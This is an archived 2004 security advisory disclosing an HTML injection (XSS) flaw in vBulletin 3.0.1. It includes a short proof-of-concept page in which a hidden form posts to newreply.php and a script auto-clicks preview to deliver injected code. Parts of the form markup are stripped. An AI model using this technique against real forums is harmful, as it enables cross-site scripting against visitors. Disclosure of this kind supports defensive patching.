TUCoPS :: Web BBS :: Frequently Exploited :: hack3691.htm

vBulletin HTML Injection Vuln
vBulletin HTML Injection Vuln 





 Advisory Name : vBulletin HTML Injection Vulnerability

  Release Date : June 24,2004 

   Application : vBulletin

       Test On : 3.0.1 or others?

        Vendor : Jelsoft(http://www.vbulletin.com/) 

      Discover : Cheng Peng Su(apple_soup_at_msn.com)

     

Intro:

     From vendor's website ,it says that ,vBulletin is a powerful, scalable and 

 fully customizable forums package for your web site. It has been written using

 the Web's quickest-growing scripting language; PHP, and is complimented with a

 highly efficient and ultra fast back-end database engine built using MySQL.



Proof of concept:

     While a user is previewing the post , both newreply.php and newthread.php 

 do sanitize the input in 'Preview',but not Edit-panel,malicious code can be 

 injected thru this flaw.

 

Exploit:

     A page as below can lead visitor to a Preview page which contains XSS code.

    

   -------------------------Remote.html-------------------------

   
action="http://host/newreply.php" name="vbform" 

   method="post" style='visibility:hidden'>

   

		

		

		

		

   


   <script>

     document.all.preview.click();

   </script>

   -----------------------------End-----------------------------

   



Solution:

     vBulletin Team will release a patch or a fixed version as soon as possible.



Contact:

  Cheng Peng Su

  apple_soup_at_msn.com

  Class 1,Senior 2,High school attached to Wuhan University

  Wuhan,Hubei,China

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH